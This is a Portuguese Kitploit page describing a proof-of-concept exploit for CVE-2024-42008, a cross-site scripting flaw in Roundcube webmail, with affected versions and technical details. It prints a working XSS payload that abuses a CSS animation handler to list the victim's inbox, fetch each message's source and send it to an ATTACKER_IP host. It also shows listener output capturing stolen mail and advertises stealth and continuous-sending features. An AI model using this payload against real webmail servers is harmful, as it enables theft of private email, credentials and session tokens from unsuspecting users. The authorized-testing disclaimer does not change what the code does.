Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!
Roundcube-CVE-2024-42008-POC — Exploit de prova de conceito para CVE-2024-42008, uma vulnerabilidade de Cross-Site Scripting no webmail RoundCube. Entrega payloads XSS por meio de formulários de contato para roubar e-mails, credenciais e tokens de sessão em ambientes autorizados de teste de penetração. | Kitploit
Exploit de prova de conceito para CVE-2024-42008, uma vulnerabilidade de Cross-Site Scripting no webmail RoundCube. Entrega payloads XSS por meio de formulários de contato para roubar e-mails, credenciais e tokens de sessão em ambientes autorizados de teste de penetração.
Este repositório contém uma prova de conceito de exploração para CVE-2024-42008, uma vulnerabilidade de Cross-Site Scripting (XSS) na aplicação de webmail RoundCube. Esta exploração foi projetada para fins educacionais e ambientes controlados de teste de penetração como HackTheBox.
Detalhes da Vulnerabilidade
Resumo do CVE-2024-42008
CVE ID: CVE-2024-42008
Tipo: Cross-Site Scripting (XSS)
Pontuação CVSS: Alta
Versões Afetadas:
RoundCube ≤ 1.5.7
RoundCube 1.6.x ≤ 1.6.7
Versões Corrigidas: 1.5.8, 1.6.8+
Detalhes Técnicos
A vulnerabilidade existe em rcmail_action_mail_get->run() e permite que atacantes remotos executem JavaScript arbitrário nos navegadores das vítimas. A falha decorre da validação insuficiente de entrada ao processar conteúdo de e-mail, especialmente no tratamento de animações CSS e contextos de execução JavaScript.
Vetor de Ataque Chave:
Conteúdo HTML malicioso injetado através de formulários de contato ou mensagens de e-mail
Propriedades de animação CSS usadas para acionar a execução de JavaScript
Manipuladores de evento onanimationstart contornam filtros de conteúdo
O payload JavaScript executa no contexto da aplicação de webmail
Impacto
A exploração bem-sucedida permite que atacantes:
Roubar e-mails da vítima da CAIXA DE ENTRADA e outras pastas
Exfiltrar metadados de e-mail (UIDs, listas de mensagens)
Acessar código-fonte e anexos de e-mail
Enviar e-mails da conta da vítima
Coletar credenciais de login e tokens de sessão
Realizar ações em nome da vítima
Análise do Script de Exploração
Arquitetura do Script
A exploração consiste em três componentes principais:
Entrega de Payload XSS: Envia HTML malicioso via formulário de contato
Servidor HTTP: Escuta dados exfiltrados
Processamento de Dados: Captura e registra e-mails roubados
Detalhamento do Payload
root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
// 1. Fetch email list from victim's INBOX
fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
.then(r=>r.text())
.then(t=>{
// 2. Extract email UIDs using regex
[...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
// 3. For each email, fetch full source
fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
.then(r=>r.text())
.then(data=>{
// 4. Exfiltrate email data to attacker server
fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
})
})
})
; foo=bar">
Principais Características
Operação Contínua: Pode enviar payloads em intervalos regulares
Modo Furtivo: Pegada mínima e tratamento de erros
Registro de Dados: Captura e armazenamento automáticos de e-mails exfiltrados
Modo de Depuração: Suporte a proxy para análise de tráfego
Configurável: Múltiplas opções de linha de comando
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200
[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log
Aviso Legal
Este código é fornecido apenas para fins educacionais e teste de penetração autorizado. Os autores não são responsáveis por qualquer uso indevido ou dano causado por este software. Sempre certifique-se de ter autorização adequada antes de testar qualquer sistema.